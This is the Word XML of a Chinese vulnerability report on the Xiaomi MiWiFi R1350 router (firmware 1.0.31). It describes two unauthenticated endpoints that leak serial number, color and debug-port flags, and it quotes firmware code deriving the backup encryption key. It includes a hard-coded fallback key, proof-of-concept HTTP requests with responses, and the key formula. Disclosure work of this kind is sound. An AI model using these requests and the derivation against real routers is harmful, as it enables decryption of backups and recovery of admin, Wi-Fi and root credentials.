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843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Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>小米 MiWiFi R1350 路由器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D979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厂商：小米（Xiaomi）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CBA6E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产品：小米 AIoT 路由器 R1350（AC1200）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A996B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固件版本：1.0.31（miwifi_r1350_firmware_7449d_1.0.31.bin，QSDK / OpenWrt，MIPS32 大端）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792C80E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漏洞类型：未授权泄露安全相关出厂数据 / 备份密钥材料（CWE-200）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6C405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概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFEFA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小米 MiWiFi R1350（固件 1.0.31）存在两个未授权接口（路由标志位 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts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0x09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= noauth + noinit），可向任意 LAN 侧客户端泄露出厂分区数据和设备安全状态：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF8B5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/cgi-bin/luci/api/xqsystem/bdata  -&gt; 完整的 "bdata show" 输出（SN、color、出厂标志等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBA36E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/cgi-bin/luci/api/xqsystem/fac_info -&gt; telnet/ssh/uart 开启标志、出厂模式、SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C37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泄露的字段并非普通标识符：固件本身会从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+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color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（外加设备 MAC 地址）派生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配置备份加密密钥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，而小米官方的 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SSH root 密码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也是由设备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派生的。因此该泄露直接提供了离线解密配置备份、计算 root 凭据所需的密钥材料，同时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fac_info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还可充当侦察通道，用于探明设备开放了哪些调试入口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335EA3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漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A9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1. 未授权暴露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E1F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/usr/lib/lua/luci/controller/api/xqsystem.lua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（路由注册，标志位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0x09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）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB40BD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1770" cy="4144645"/>
            <wp:effectExtent l="0" t="0" r="508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5A30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entry({"api", "xqsystem", "fac_info"}, call("getFacInfo"), (""), 101, 0x09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FD72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entry({"api", "xqsystem", "bdata"},  call("getBdataInfo"), (""), 101, 0x09)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CF8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/usr/lib/lua/xiaoqiang/util/XQSysUtil.lua:1056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不加任何过滤地返回 bdata 分区的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所有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键值对：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B2F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69230" cy="4032250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DBD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function bdataInfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3228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local str = LuciUtil.exec("bdata show")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B879A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... -- 将 "key=value" 行解析为 table，无白名单过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3372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LuciHttp.write_json(XQSysUtil.bdataInfo())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F3C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固件中已确认引用的敏感键：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XQConfigs.lua:116 GET_BDATA_SN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XQBackup.lua:13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color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XQBackup.lua:14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CountryCode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XQCountryCode.lua:88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），以及出厂/SSID 相关键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2550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2. 影响链 A —— 配置备份解密（固件原始代码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2863ED6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/usr/lib/lua/xiaoqiang/module/XQBackup.lua:7-19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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB62E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2405" cy="2555240"/>
            <wp:effectExtent l="0" t="0" r="444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1E9E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local function generate_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F80560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local key = "7kl4n23mnm678m890s9dfklnmdqmwenq"    -- 硬编码兜底密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A487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sn = string.sub(XQFunction.bdataGet("SN","0529486"), 1, 5) -- &lt;- 由 /bdata 泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C8274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color = string.sub(XQFunction.bdataGet("color","1000"), 1, 3) -- &lt;- 由 /bdata 泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220A74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mac1 = getmac | 第 1 个 MAC（小写，无冒号）          -- &lt;- 在以太网帧中可见</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9AAC2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mac2 = getmac | 第 2 个 MAC                  -- &lt;- 出厂 MAC 是连续的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4088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if sn ~= nil and color ~= nil and mac1 ~= nil and mac2 ~= nil then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F977ED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  key = sn .. mac1 .. mac2 .. color             -- 32 字节备份密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7A13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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10644A9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  return key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490EEA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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F362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加密备份（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/api/misystem/backup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）按同文件中的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_mi_basic_info()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/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_mi_wifi_info()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/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_mi_network_info()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打包了以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C81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管理员账号密码哈希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uci account.common.admin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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E8AF5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两个 Wi-Fi 的 SSID 和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D412CF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left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/>
        <w:jc w:val="left"/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WAN 配置，包括 PPPoE 宽带用户名/密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F74D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攻击者从未授权接口拿到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和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color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，再从二层（Layer 2）观察到设备 MAC（出厂 MAC 是连续的），此后只要获得任意一个备份文件（用户分享的、云端同步的，或后续通过认证后入侵导出的），即可离线解密。如果 bdata 为空，固件会退回到一个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所有设备共用的硬编码密钥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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4466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24"/>
          <w:szCs w:val="24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FFFFFF"/>
        </w:rPr>
        <w:t>3. 影响链 B —— SN 派生 root 密码侦察</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDDEC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小米官方的 SSH/telnet root 密码是设备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的已知函数（已被公开逆向，存在现成计算器）。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fac_info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则能在尝试之前告诉攻击者当前开放了哪些调试通道：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED9817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{"telnet":false,"init":true,"wl0_ssid":"...","ssh":false,"version":"1.0.31","facmode":true,"4kblock":false,"wl1_ssid":"...","uart":false}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C06C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对于处于出厂模式的设备（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facmode:true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，telnet 已开启），泄露的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可直接换算出 root 登录凭据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FC94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漏洞证明（PoC）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ABF3E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/cgi-bin/luci/api/xqsystem/bdata HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A395EA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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8766C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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F080E3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{" CountryCode":"CN","wl0_ssid":"Xiaomi_POC_5G","SN":"H2D0901907235","factory":"RTYPE RCC"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7E3EC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GET /cgi-bin/luci/api/xqsystem/fac_info HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8EB22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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746AC4D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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE274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{"telnet":false,"init":true,"wl0_ssid":"Xiaomi_POC_5G","ssh":false,"version":"1.0.31","facmode":true,"4kblock":false,"wl1_ssid":"Xiaomi_POC_2G","uart":false}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64DF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攻击者利用泄露值进行密钥材料派生（依据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XQBackup.lua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）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49B1A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23241F"/>
        <w:spacing w:before="38" w:beforeAutospacing="0" w:after="38" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:righ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8F8F2"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>key = SN[0:5] + mac1(12 位十六进制) + mac2(12 位十六进制) + color[0:3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7286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影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A7C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未授权的 LAN 侧攻击者可以获得设备派生以下两类秘密的确切材料（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SN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、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color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）：(a) 配置备份的加密密钥——备份中包含管理员密码哈希、Wi-Fi 密码和 PPPoE 宽带凭据；(b) telnet/SSH 所用的、由 SN 派生的官方 root 密码。同时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fac_info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还会暴露哪些入口是开放的。这使该泄露从“出厂元数据”升级为</w:t>
      </w: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凭据材料泄露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>，实质性削弱了设备上存储的所有秘密的保密性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C61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31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复现结果</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="044AF8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2405" cy="652780"/>
            <wp:effectExtent l="0" t="0" r="4445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90F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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="766445"/>
            <wp:effectExtent l="0" t="0" r="5715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3C6F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两个接口均在 qemu-mips + chroot 模拟的固件环境中（原始 nginx → fcgi-cgi → LuCI 栈）经过动态验证：请求不携带任何会话令牌，处理器输出如上所示原样返回（因模拟环境无出厂 NVRAM 分区，bdata 输出通过 wrapper 修正）。影响链 A 中引用的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XQBackup.generate_key()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派生逻辑为固件代码，已通过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spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>/usr/lib/lua/xiaoqiang/module/XQBackup.lua:7-19</w:t>
      </w:r>
      <w:r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9"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的静态分析确认。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CC2B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7C2A83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="087C2A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59BBECF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59BBEC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7052A1"/>
    <w:rsid w:val="1CB05AC8"/>
    <w:rsid w:val="284502B4"/>
    <w:rsid w:val="52F52E3D"/>
    <w:rsid w:val="734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b/>
      <w:bCs/>
      <w:kern w:val="0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2025-02-10T06:03:00Z</dcterms:created>
  <dc:creator>11226</dc:creator>
  <cp:lastModifiedBy>cinqseptfive</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-17T02:27:00Z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783E61DC5BDD4CA294A964ED3C1204EC_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYjkyZmNhZmMwYTRkMzdjNDc0ZDBiODA4ZTNmNjg2YzYiLCJ1c2VySWQiOiIxNDQ5MzUxNjY0In0=</vt:lpwstr>
  </property>
</Properties>
</file>